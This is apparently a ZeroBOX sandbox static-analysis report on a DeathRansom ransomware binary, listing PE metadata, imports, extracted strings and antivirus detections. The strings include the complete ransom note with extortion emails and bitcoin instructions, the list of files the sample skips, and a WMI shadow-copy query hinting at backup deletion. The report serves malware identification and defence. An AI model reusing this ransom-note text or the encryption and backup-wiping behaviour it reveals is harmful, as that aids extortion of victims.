Static | ZeroBOX

PE Compile Time

2019-11-16 17:37:02

PE Imphash

3078147a4b21d62a2ff5d0ed67f98e73

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000aa78 0x0000ac00 6.54538271786
.rdata 0x0000c000 0x00002430 0x00002600 5.20131142038
.data 0x0000f000 0x000001b4 0x00000200 0.338113410335
.reloc 0x00010000 0x00000384 0x00000400 6.06741938353

Imports

Library SHLWAPI.dll:
0x40c0b8 StrStrW
0x40c0bc wnsprintfA
0x40c0c0 wnsprintfW
Library MSVCRT.dll:
0x40c098 memcpy
0x40c09c memset
Library SHELL32.dll:
0x40c0b0 SHEmptyRecycleBinA
Library MPR.dll:
0x40c088 WNetEnumResourceW
0x40c08c WNetCloseEnum
0x40c090 WNetOpenEnumW
Library KERNEL32.dll:
0x40c018 ExitProcess
0x40c024 LoadLibraryA
0x40c028 GetProcAddress
0x40c02c GetModuleHandleA
0x40c030 lstrlenW
0x40c034 HeapFree
0x40c038 HeapReAlloc
0x40c03c HeapAlloc
0x40c040 GetProcessHeap
0x40c044 ReadFile
0x40c048 WriteFile
0x40c04c QueueUserWorkItem
0x40c050 Sleep
0x40c058 CloseHandle
0x40c05c SetFilePointerEx
0x40c060 lstrlenA
0x40c064 FindFirstFileW
0x40c068 FindNextFileW
0x40c06c FindClose
0x40c070 CreateFileW
0x40c074 GetCurrentProcess
0x40c078 lstrcmpW
0x40c07c MoveFileW
0x40c080 lstrcpyW
Library USER32.dll:
0x40c0c8 CharLowerW
Library ADVAPI32.dll:
0x40c000 RegSetValueExA
0x40c004 RegOpenKeyExA
0x40c008 RegCreateKeyA
0x40c00c RegCloseKey
0x40c010 RegQueryValueExA
Library ole32.dll:
0x40c0d4 CoSetProxyBlanket
0x40c0d8 CoCreateInstance
Library OLEAUT32.dll:
0x40c0a4 VariantInit
0x40c0a8 VariantClear

!This program cannot be run in DOS mode.
Rich3z
`.rdata
@.data
.reloc
0123456789abcdefghijklmnopqrstuvwxyz
public
private
--= DEATHRANSOM =---
***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED***********************
*****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS*****
All your files, documents, photos, databases and other important
files are encrypted.
You are not able to decrypt it by yourself! The only method
of recovering files is to purchase an unique private key.
Only we can give you this key and only we can recover your files.
To be sure we have the decryptor and it works you can send an
email death@firemail.cc and decrypt one file for free. But this
file should be of not valuable!
Do you really want to restore your files?
Write to email
death@cumallover.me
death@firemail.cc
Your LOCK-ID: %s
>>>How to obtain bitcoin:
The easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.
https://localbitcoins.com/buy_bitcoins
Also you can find other places to buy Bitcoins and beginners guide here:
http://www.coindesk.com/information/how-can-i-buy-bitcoins/
>>> Free decryption as guarantee!
Before paying you send us up to 1 file for free decryption.
We recommeded to send pictures, text files, sheets, etc. (files no more than 1mb)
IN ORDER TO PREVENT DATA DAMAGE:
1. Do not rename encrypted files.
2. Do not try to decrypt your data using third party software, it may cause permanent data loss.
3. Decryption of your files with the help of third parties may cause increased price (they add their fee to
our) or you can become a victim of a scam.
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
IsWow64Process
kernel32.dll
advapi32.dll
SystemFunction036
SOFTWARE\Wacatac
.text$mn
.idata$5
.rdata
.rdata$zzzdbg
.idata$2
.idata$3
.idata$4
.idata$6
wnsprintfA
wnsprintfW
StrStrW
SHLWAPI.dll
MSVCRT.dll
SHEmptyRecycleBinA
SHELL32.dll
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
MPR.dll
HeapFree
HeapReAlloc
HeapAlloc
GetProcessHeap
ReadFile
WriteFile
QueueUserWorkItem
InterlockedExchangeAdd
CloseHandle
SetFilePointerEx
lstrlenA
FindFirstFileW
FindNextFileW
FindClose
CreateFileW
lstrcpyW
lstrcmpW
MoveFileW
GetCurrentProcess
lstrlenW
GetModuleHandleA
GetProcAddress
LoadLibraryA
GetUserDefaultLangID
GetLogicalDriveStringsW
ExitProcess
KERNEL32.dll
CharLowerW
GetKeyboardLayoutList
USER32.dll
RegSetValueExA
RegQueryValueExA
RegOpenKeyExA
RegCreateKeyA
RegCloseKey
ADVAPI32.dll
CoCreateInstance
CoSetProxyBlanket
ole32.dll
OLEAUT32.dll
memcpy
memset
expand 32-byte k
programdata
$recycle.bin
program files
windows
all users
appdata
read_me.txt
autoexec.bat
desktop.ini
autorun.inf
ntuser.dat
iconcache.db
bootsect.bak
boot.ini
ntuser.dat.log
thumbs.db
%s.wctc
%s\read_me.txt
__ProviderArchitecture
ROOT\cimv2
select * from Win32_ShadowCopy
Win32_ShadowCopy.ID='%s'
\\?\%c:
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.DeathRansom.4!c
tehtris Generic.Malware
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
Skyhigh BehavesLike.Win32.Generic.qh
ALYac Trojan.Ransom.DEATHRansom
Cylance Unsafe
Zillya Trojan.Filecoder.Win32.11115
Sangfor Trojan.Win32.Generic.ky
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Ransom:Win32/generic.ali2000010
K7GW Riskware ( 0040eff71 )
Cybereason malicious.d0bfb3
Baidu Clean
VirIT Trojan.Win32.Ransom.BRK
Paloalto generic.ml
Symantec Downloader
Elastic Windows.Ransomware.Hellokitty
ESET-NOD32 Win32/Filecoder.DeathRansom.B
APEX Malicious
Avast Win32:DeathRansom-A [Trj]
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Generic.Ransom.Death.C779B2AC
NANO-Antivirus Trojan.Win32.Encoder.giysar
ViRobot Trojan.Win32.S.DeathRansom.56320
MicroWorld-eScan Generic.Ransom.Death.C779B2AC
Tencent Malware.Win32.Gencirc.10be00a5
TACHYON Ransom/W32.Death.56320
Sophos Mal/Generic-S
F-Secure Trojan.TR/FileCoder.pgzbl
DrWeb Trojan.Encoder.30115
VIPRE Generic.Ransom.Death.C779B2AC
TrendMicro Ransom.Win32.DEATHRANSOM.THKBOAIA
McAfeeD Real Protect-LS!A35596ED0BFB
Trapmine Clean
FireEye Generic.mg.a35596ed0bfb34de
Emsisoft Generic.Ransom.Death.C779B2AC (B)
SentinelOne Clean
GData Generic.Ransom.Death.C779B2AC
Jiangmin Trojan.Generic.eivkk
Webroot W32.Ransom.Deathransom
Varist W32/Death.EXIH-4433
Avira TR/FileCoder.pgzbl
Antiy-AVL Trojan/Win32.Fuerboos
Kingsoft malware.kb.a.1000
Gridinsoft Ransom.Win32.DeathRansom.dd!s1
Xcitium Malware@#rlp7bi2rrhwy
Arcabit Generic.Ransom.Death.C779B2AC
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Ransom:MacOS/FileCoder
Google Detected
AhnLab-V3 Malware/Win32.Generic.C3577333
Acronis Clean
McAfee Ransomware-GUC!A35596ED0BFB
MAX malware (ai score=100)
VBA32 BScope.Exploit.UAC
Malwarebytes Malware.AI.4090324407
Panda Trj/GdSda.A
Zoner Trojan.Win32.86827
TrendMicro-HouseCall Ransom.Win32.DEATHRANSOM.THKBOAIA
Rising Ransom.Death!1.BF5C (CLASSIC)
Yandex Trojan.Agent!KlggoVlN79A
Ikarus Trojan-Ransom.DeathRansom
MaxSecure Trojan.Malware.7164915.susgen
Fortinet W32/Filecoder.B!tr.ransom
BitDefenderTheta AI:Packer.B75C2DD91D
AVG Win32:DeathRansom-A [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (D)
alibabacloud Ransomware:Win/DeathRansom.B
No IRMA results available.